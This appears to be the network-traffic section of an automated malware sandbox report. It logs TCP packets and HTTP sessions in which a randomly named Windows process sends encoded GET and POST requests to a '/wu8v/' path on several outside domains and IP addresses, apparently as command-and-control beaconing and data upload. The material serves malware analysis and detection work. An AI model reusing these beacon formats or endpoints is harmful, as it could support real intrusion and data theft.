                                                                                                                    May 8, 2024 14:08:44.187752962 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187978029 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187988997 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.188039064 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:45.432756901 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.447571039 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.718130112 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.720784903 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.724365950 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.994585991 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.994688034 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.994716883 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:46.994927883 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:46.997283936 CEST4979180192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:47.267581940 CEST8049791137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:52.451229095 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:52.765539885 CEST804979291.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:52.765707970 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:52.767493010 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:53.079268932 CEST804979291.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:53.079293966 CEST804979291.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:53.079380989 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:54.272955894 CEST4979280192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:57.688961029 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:58.001584053 CEST804979391.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:58.001677036 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:58.007967949 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:58.320055962 CEST804979391.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:58.320076942 CEST804979391.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:08:58.320128918 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:08:59.850869894 CEST4979380192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:00.869421959 CEST4979480192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:01.180738926 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.180821896 CEST4979480192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:01.183187962 CEST4979480192.168.2.491.195.240.123
                                                                                                                    May 8, 2024 14:09:01.494430065 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.494455099 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.494537115 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.495297909 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.495310068 CEST804979491.195.240.123192.168.2.4
                                                                                                                    May 8, 2024 14:09:01.495369911 CEST4979480192.168.2.491.195.240.123
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49742 | 208.112.85.150 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:05:27.363748074 CEST | 459 | OUT | GET /wu8v/?MdtlcTm=qj5NyNfN5WRMG7LniAROgWXsn6IsT6LjPGDeNkCQJp+HAmWfWpmvawkojhaRs1ogLHUlWi64I+vgy847wrcuJ4qAlI0oKyKfHw/MBjiNhxVy0+aqylgl+KA=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.fivetownsjcc.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 14:05:27.603955030 CEST | 383 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:05:23 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-SERVER: 3908
                                                                                                                    Content-Length: 203
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wu8v/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49743 | 89.35.125.17 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:05:43.974493980 CEST | 718 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.auetravel.kz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.auetravel.kz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=l21pwZ88GD3uI1ZQcqPMIJlre4Wvuu3qkL3vu33/+aVACB8Rq7ZkBVtM1FHWu+tRv60fFGykdoNxROGiAmiQ+5XhMi77s4qdfrtJHimrBFWMwA85PMV5vzmJ2Wy6misBsgnc4uNj0yABnTE7olvps6kaM+97sGytyI4jRNQ9yw/rJLQpp/sTJAVQ0/V7pVl8qA==
May 8, 2024 14:05:44.366837025 CEST | 350 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49744 | 89.35.125.17 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:05:46.897799015 CEST | 738 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.auetravel.kz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.auetravel.kz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=l21pwZ88GD3uOWBQfNbMZZlqUYWv1e2hkL7vu2zJ+s9AFjkRt4BkAVtM+lHZq+tav64tFDKkdoxxRP2iBV6T/pXZHC710YqdfrtJHiCVBFOMwQs5NtV6zjn7xWy6iitpsgn64vg+0w4BnXA7o0vum6kcRu8VnFin5aF0XO5a8EKNMNBz4ONEbAxjp4cPkWY1xB/ZKFaTQB0W0te0ZS2eH5o=
May 8, 2024 14:05:47.288647890 CEST | 350 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:47 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49746 | 89.35.125.17 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:05:49.825542927 CEST | 10820 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.auetravel.kz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.auetravel.kz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 14:05:50.217628002 CEST | 350 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:50 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49747 | 89.35.125.17 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:05:52.744904995 CEST | 455 | OUT | GET /wu8v/?MdtlcTm=o0dJzo0+KyysCnVnWeLPfMg3QtOn0MLLvJyzkFXrx5kDb0wpr6IDXytzlnmsuKpUsYAyYVSTQNkMYoOoJGqE4svaZh/Kq8S3fINkBD+7AXaHwSZaIMNjuTk=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 14:05:53.135462999 CEST | 496 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:52 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/?MdtlcTm=o0dJzo0+KyysCnVnWeLPfMg3QtOn0MLLvJyzkFXrx5kDb0wpr6IDXytzlnmsuKpUsYAyYVSTQNkMYoOoJGqE4svaZh/Kq8S3fINkBD+7AXaHwSZaIMNjuTk=&_X=ClAdyH4P7rA8z
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49748 | 38.63.111.149 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:05:59.073165894 CEST | 718 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.rltattoo.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.rltattoo.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=pOWHJ8tpMJWQkCPW3ksdEZ3XvvhNIU6ElzASjHivxbJEzqFu1GM/LMpoFuRq4dq45fYQg6szkV88eRhW3r3jU3m0fEvdCKTnvfqWE2IB3osOuXSeKFJu9sDZo29Rkw222SVMM4qDZb+cygULZ+lU5Bt37JOPsBOaV8GUUn9KSE1EFzcQ3AlIKEXDiSlnFFx0qQ==
May 8, 2024 14:05:59.256957054 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:05:56 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:05:59.256972075 CEST | 53 | IN | Data Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    6 | 192.168.2.4 | 49749 | 38.63.111.149 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:02.765294075 CEST | 738 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.rltattoo.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.rltattoo.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=pOWHJ8tpMJWQli/W0DYdIp3YgPhNB07NlzcSjGm/xtZEzOJu0HM/OMpoXORl8dqm5fVvg6gzkVY8eUFW3cDsbHmqK0vfPqTnvfqWE2cv3sIOumCeNQlt3MDep29Rgw2y2SVUM9O9ZdycyhkLasdT3Bs81pPIkUzRbOXTZAV7VGgkE1NKmxEfYEzw/VsTIGM9xb/CAor2/QawYAvRrBTxHMg=
                                                                                                                    May 8, 2024 14:06:02.950977087 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:06:00 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:02.951092005 CEST | 53 | IN | Data Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    7 | 192.168.2.4 | 49750 | 38.63.111.149 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:05.485709906 CEST | 7734 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.rltattoo.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.rltattoo.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm= [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:05.671426058 CEST | 3086 | OUT | Data Raw: 5a 73 66 64 2b 41 33 4e 56 66 32 4d 2f 54 39 57 37 4e 65 48 47 32 37 42 71 77 52 35 50 6a 64 64 78 4c 77 77 5a 6f 36 69 52 50 51 6f 5a 50 4a 6e 6f 6c 69 58 35 62 30 44 72 69 39 55 2b 6f 43 30 6e 48 50 53 6c 6b 51 48 67 54 75 64 68 43 5a 6b 47 42
                                                                                                                    Data Ascii: Zsfd+A3NVf2M/T9W7NeHG27BqwR5PjddxLwwZo6iRPQoZPJnoliX5b0Dri9U+oC0nHPSlkQHgTudhCZkGB8FMLvbwVru4w7ly4HwE9cvcKCGiq9+PFGU/YPlDYvBf5dIjUSjsuMvK8AkUu8DWLsq0uYc9OXCoGK/pRh3t5D1OSwSL4sIM9PcYTD9gttsRMw6GQiLsDsqzihw47JXl/PUiqfSrvc2cESYefHKbbAAQfGbrMIQKXj
                                                                                                                    May 8, 2024 14:06:05.857281923 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:06:03 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:05.857295036 CEST | 53 | IN | Data Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    8 | 192.168.2.4 | 49751 | 38.63.111.149 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:08.200114965 CEST | 455 | OUT | GET /wu8v/?MdtlcTm=kM+nKItVIOm9nxv083MKEZreo78kZmjvmDxFimKXw4NllaUxz2FZA/AxFfoR4c/c0+8T1IsyqFRuVBpkxsrpf3yFfXK/MNDg35iPLFQJ6s8K1nL5VHh3xe8=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:06:08.383965015 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:06:05 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:08.383979082 CEST | 53 | IN | Data Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    9 | 192.168.2.4 | 49752 | 116.203.164.244 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:14.586652994 CEST | 724 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.wp-bits.online
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.wp-bits.online/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=s+c3Badf9t2JyfRC88c085awHyLGj2SOidVT9JcozbBGHtrtNXA80h85vFJiOlgieH1fROP/sJrN/DmEo95ahG272lH62b6wzoTsHe5kSB7oSIzD98aBzwMRew3WNXMQbwQViNNmYcKpAnRTBHeQqAXz8hc08ilmPq7zoGHFynaKiIMV61w70a0aZ+wBysUBzA==
                                                                                                                    May 8, 2024 14:06:14.917412043 CEST | 346 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:14 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: br
                                                                                                                    Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
